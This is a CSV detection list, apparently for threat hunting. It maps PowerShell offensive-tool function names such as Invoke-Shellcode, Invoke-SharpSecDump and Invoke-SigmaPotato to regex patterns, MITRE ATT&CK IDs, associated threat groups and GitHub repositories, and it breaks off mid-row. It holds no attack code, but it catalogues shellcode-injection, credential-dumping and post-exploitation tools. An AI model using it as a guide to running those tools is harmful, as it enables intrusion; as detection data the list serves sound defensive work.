"*Invoke-SharpRDP*",".{0,1000}Invoke\-SharpRDP.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49603" "*Invoke-SharpRDP*",".{0,1000}Invoke\-SharpRDP.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49604" "*Invoke-SharpRDP.ps1*",".{0,1000}Invoke\-SharpRDP\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49605" "*Invoke-SharpRDPTest*",".{0,1000}Invoke\-SharpRDPTest.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49606" "*Invoke-SharpSCCM*",".{0,1000}Invoke\-SharpSCCM.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49607" "*Invoke-SharpSCCM*",".{0,1000}Invoke\-SharpSCCM.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49608" "*Invoke-SharpSecDump *",".{0,1000}Invoke\-SharpSecDump\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - 
T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49609" "*Invoke-SharpSecDump*",".{0,1000}Invoke\-SharpSecDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49610" "*Invoke-SharpSecDump.ps1*",".{0,1000}Invoke\-SharpSecDump\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 
- T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49611" "*Invoke-Sharpshares*",".{0,1000}Invoke\-Sharpshares.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49612" "*Invoke-SharpSniper*",".{0,1000}Invoke\-SharpSniper.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49613" "*Invoke-SharpSploit*",".{0,1000}Invoke\-SharpSploit.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49614" "*Invoke-Sharpsploit_nomimi*",".{0,1000}Invoke\-Sharpsploit_nomimi.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49615" "*Invoke-SharpSSDP*",".{0,1000}Invoke\-SharpSSDP.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49616" "*Invoke-SharpStay*",".{0,1000}Invoke\-SharpStay.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49617" "*Invoke-SharpUp*",".{0,1000}Invoke\-SharpUp.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49618" "*Invoke-SharpUp*",".{0,1000}Invoke\-SharpUp.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - 
T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49619" "*Invoke-Sharpview*",".{0,1000}Invoke\-Sharpview.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49620" "*Invoke-SharpWatson*",".{0,1000}Invoke\-SharpWatson.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49621" "*Invoke-Sharpweb*",".{0,1000}Invoke\-Sharpweb.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49622" "*Invoke-Sharpweb*",".{0,1000}Invoke\-Sharpweb.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49623" 
"*Invoke-SharpWeb.ps1*",".{0,1000}Invoke\-SharpWeb\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49624" "*Invoke-SharpWSUS*",".{0,1000}Invoke\-SharpWSUS.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49625" "*Invoke-Shellcode -Payload *",".{0,1000}Invoke\-Shellcode\s\-Payload\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","49626" "*Invoke-Shellcode -ProcessId ",".{0,1000}Invoke\-Shellcode\s\-ProcessId\s","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential 
Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","49627" "*Invoke-Shellcode -ProcessId *",".{0,1000}Invoke\-Shellcode\s\-ProcessId\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","49628" "*Invoke-Shellcode -Shellcode *",".{0,1000}Invoke\-Shellcode\s\-Shellcode\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","49629" "*Invoke-Shellcode -Shellcode*",".{0,1000}Invoke\-Shellcode\s\-Shellcode.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","0","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","49630" "*Invoke-Shellcode*",".{0,1000}Invoke\-Shellcode.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be 
used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49631" "*Invoke-Shellcode*",".{0,1000}Invoke\-Shellcode.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1620 - T1055.001 - T1059.004 - T1027 - T1105","TA0005 - TA0004 - TA0002","N/A","N/A","Resource Development","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","N/A","10","2262","473","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z","49632" "*Invoke-Shellcode*",".{0,1000}Invoke\-Shellcode.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","49633" "*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1139","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49634" "*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49635" "*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49636" "*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49637" 
"*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","49638" "*Invoke--Shellcode.ps1*",".{0,1000}Invoke\-\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","49639" "*Invoke-ShellcodeMSIL*",".{0,1000}Invoke\-ShellcodeMSIL.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1074","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49640" "*Invoke-ShellcodeMSIL.ps1*",".{0,1000}Invoke\-ShellcodeMSIL\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - 
T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49641" "*Invoke-ShellCommand*",".{0,1000}Invoke\-ShellCommand.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49642" "*Invoke-SigmaPotato *",".{0,1000}Invoke\-SigmaPotato\s.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","49643" "*Invoke-SigmaPotato.ps1*",".{0,1000}Invoke\-SigmaPotato\.ps1.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - 
